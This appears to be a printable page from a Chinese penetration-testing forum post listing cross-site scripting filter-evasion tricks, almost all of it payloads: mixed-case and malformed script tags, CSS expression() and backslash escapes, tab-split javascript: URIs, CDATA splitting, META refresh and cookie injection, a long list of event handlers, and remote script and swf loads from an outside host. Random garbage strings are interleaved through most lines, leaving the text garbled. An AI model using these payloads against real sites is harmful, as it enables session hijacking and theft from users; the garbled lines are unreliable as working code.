中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
: m# I4 |% w/ B* D  ]* e
2 K# k3 }1 S- L  }# ]7 v. h / v: y! C& A7 T  c+ w; v% H

( M. Z/ K9 t/ N, u9 @/ K) n& O    <sCript>alert(‘d’)</scRipT>5 b( A$ v9 ]0 Q7 Z

9 V5 Q$ J: @9 D  ?2. 利用多加一些其它字符来规避Regular Expression的检查7 C' X1 n7 U/ o7 [) L, \' |: U
1 z4 O6 S5 W5 ]7 [( ~* J
    <<script>alert(‘c’)//<</script>
  o, }" M6 A& q# N
5 g7 `1 _1 J  z+ c    <SCRIPT a=">" SRC="t.js"></SCRIPT>6 f4 T( a5 c- q6 {) j, M

1 o- k. M# @( y0 a* a! n+ [& Q    <SCRIPT =">" SRC="t.js"></SCRIPT>0 T# Q: @. }2 n' I5 B

2 i& S$ G2 }( A' n    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>" H- h; }. y% ~* P6 h& K$ b4 ]7 N1 Y  W
! u6 f3 [6 h! p, T3 {
    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>$ ^0 A6 j' k* H& G/ x  f

/ ^% k# k3 ?7 V0 `3 M( u    <SCRIPT a=`>` SRC="t.js"></SCRIPT>0 s  u" G( i8 h% L
% \  a1 A2 m8 j3 \- X
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>$ ]; h/ D: c' i& i: b

- r& D: b# o0 u  t0 B3. 以其它扩展名取代.js/ n, B( |& Z1 K

+ @% p. `% o- {( }    <script src="bad.jpg"></script>8 }' C& a; p% z7 Z% w
# x& w  Y# ^# Y1 S. ]
4. 将Javascript写在CSS档里
' x: b+ w& S6 M: P1 W+ s* l# y: W+ O7 P* h8 J' F
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
0 Y; ~# }! E: W2 _1 q- p  b* o$ o5 v8 ~* ^- R6 H
       example:
) _# {' j8 k3 ?5 b: k8 o
0 y" J8 \/ S. r$ M7 |' R+ }+ ~  E% u          body {3 {; n! `2 r! Q8 O; g

/ v0 s" Y) K6 N1 `% M- R               background-image: url(‘javascript:alert("XSS");’)
. e8 \7 v. a8 r5 u# ~2 u$ O
/ U0 I6 G' I2 v' i$ i. r$ z          }0 I- L  ?+ T. j
: C( P3 Q6 ~/ \9 N/ n
5. 在script的tag里加入一些其它字符3 R0 `  C  r6 E5 n) e
0 E! a5 w4 r! ~: M3 Q+ b( ~
    <SCRIPT/SRC="t.js"></SCRIPT>9 M  @9 E+ q/ I, a/ j
- f- [& H/ T) Y  o
    <SCRIPT/anyword SRC="t.js"></SCRIPT>: H* O. ^. w( P$ F" f
  ^7 C: A- y2 F8 ^+ M( H
6. 使用tab或是new line来规避
) }! d9 [/ A; H7 }$ V8 b! M4 K
    <img src="jav ascr ipt:alert(‘XSS3′)"># H- K2 D: [" i9 L- a6 _  q+ D8 \
, ]: F* y8 l/ u+ B: r
    <img src="jav ascr ipt:alert(‘XSS3′)">
1 S1 C9 D9 L# f$ T4 H& Z; l6 f4 w5 p7 Q
    <IMG SRC="jav ascript:alert(‘XSS’);"># b) _% Y5 O4 j: P( M& V6 _
* Q  f; |  P' n* d! I# [
         -> tag3 M: I) D+ f% p2 X+ B6 b1 U
. n0 R& N! w( u9 u' R8 U2 ~
         -> new line( a! S1 f  Z% D* J8 b, ^9 O
& m* v; }7 d0 K+ X; g
7. 使用"\"来规避
8 S( M) V& C/ W5 x- ^! H, j
+ R3 ?/ [5 T1 [  m5 E: F    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
" v# g; I1 \3 Y2 |* a
# a, U0 s8 l4 Q4 h7 z    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>5 g# z& V4 t! \8 S4 A7 g! a

8 _8 w: M* x, y8 i. ]9 P) p( Q    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
, D6 v- i" \9 G) B  ^3 v+ O& }4 J- j; a) p  e0 U
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">. H/ q8 k) k8 M; S* d- J. R

; `( H2 _" X( w4 ]& W# @& w+ Q    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>" _3 s, t: c7 Z+ Z/ j) j& _

: `3 B, O# g5 Z& a5 [8. 使用Hex encode来规避(也可能会把";"拿掉)4 X8 |5 ]7 W! p$ Y
$ u0 m1 N# a. r: u
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">$ q5 n/ Y- X/ n4 O) {0 e4 P, s

1 B& i; D) |2 m0 Y" n        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
0 o$ C! b9 Z- J( n: r, `0 k% R- x- g" {
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">- I/ G. [  f4 V

* D' P! y, I0 r% a        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
6 w8 p; F# V+ s% b+ l( \7 E6 o& I7 w1 A5 i: a( s3 c
9. script in HTML tag
" n8 B1 i* l: F) e0 V" m# Z# a9 P* [; r$ a/ E/ h% f4 Z
    <body onload=」alert(‘onload’)」>% o  K4 d8 j* C7 K' {2 S

6 U9 O6 _; H1 E+ J$ V, H( e        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
6 ?, a  H% Q- ^5 o0 J8 e% L' W; D
10. 在swf里含有xss的code
: X) I8 z* ]3 d' E6 ~% \
& I7 n* f; F- Z    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>6 x* b, ]/ D7 v# Y
) x. _  T4 C  a
11. 利用CDATA将xss的code拆开,再组合起来。
1 e: Q1 ]- Z8 j' ^
* X2 k9 ]! a( ?5 F; \  K2 V+ v    <XML ID=I><X><C>. ]+ L" V' ]* S4 g: {, Y* J

( Z6 b( }; M& W1 K' y    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>4 D" Y; ?8 I  k+ v# N# M' f  ?- }
: H; M' f& R4 ^+ Z) p7 p+ t
    </C></X>, V+ S0 _5 N1 l% w$ D8 k

8 [3 G, t5 N- B0 ]3 L/ ?- \% Z    </xml>0 ~2 s+ p- R. N5 s* q6 k

% @2 Q8 t# u# d0 N5 d  r    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
2 K1 t! F: l" B2 N: N1 j  Y4 h9 H. i' [" z8 R4 ^
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
8 f5 B: Z2 v" N4 P/ U/ L/ U
  P' \- g! e5 V; I7 A    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>: X" ]- q. Q9 A- G; R3 F

' w6 g& u1 T3 Q( a7 S1 O12. 利用HTML+TIME。
6 h6 O, H* l: s; k- y
. ^- D# v) w4 @; Z5 g0 h; ]9 I: e3 G. m    <HTML><BODY>
8 m+ g: S: ]+ F7 i$ s  x+ B
: ?$ U% t" n4 `) I    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
! O0 B( I$ K% \1 ?1 e9 {- S" r2 |% y0 |' }1 H" q- D5 A. O
    <?import namespace="t" implementation="#default#time2">8 [9 |  k3 O3 c, P; Y, @) c

8 r. K7 T$ ?5 U. }    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
  G8 o8 M& J' r5 \8 B/ E. S' [) K) o( {0 [& a( b- o* D
    </BODY></HTML>% X+ E2 E5 S: d

- V0 ?1 G2 W! H6 ]' t9 z7 p13. 透过META写入Cookie。
0 v4 Z, x# h- p% p9 K( p3 [; ?
& ~- n9 K  [' d. P0 l    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
9 K5 O+ I# X) v, V, [; b: c, M. `& H  o& Q0 j
14. javascript in src , href , url
1 D$ j7 M# X# f" ^, C; f  M
+ j0 I7 x& k( q3 M& T    <IFRAME SRC=javascript:alert(’13′)></IFRAME>* o! X  v; D  V, J
0 u6 x+ ?4 L$ T$ f& ~
    <img src="javascript:alert(‘XSS3′)"># ?7 T; X! l) W2 X
' Z! [( Z. j$ s# f  D4 V' _# J1 o
<IMG DYNSRC="javascript:alert(‘XSS20′)">1 ?, W, N2 l: `8 g# M) t* _- T

! a( u: Z  e( v7 T/ U    <IMG LOWSRC="javascript:alert(‘XSS21′)">4 O$ B, w2 j  A3 n3 K
2 g- n% N" U7 I
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">2 h+ g! g5 w3 m  r/ m2 c+ w
. B& N3 C/ q& D% P
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>  V, l7 y; e) x: ~9 B# x; a

" W2 N+ @  B3 X9 T+ H( G: R0 k4 o    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
$ `( G8 A" T) M/ L$ L3 b8 e. g/ U% G( R( x2 Q0 u, S) D
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">' U% t. B  w* W; l! A6 o5 b

" W9 q5 ~* I& x" y" M; u2 ?6 d1 \- t    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}' F2 f) n( R$ s$ s; z( Z

4 z6 a" D" @4 Z) k& Z$ a    </STYLE><A CLASS=XSS></A>
2 `( T5 h1 j9 R$ C+ x( W
( v+ q9 I& q/ Q5 K0 C* R/ \    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
3 W) A& ?2 q7 u0 T) g) M: A9 H" ], {: a. T! U  s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2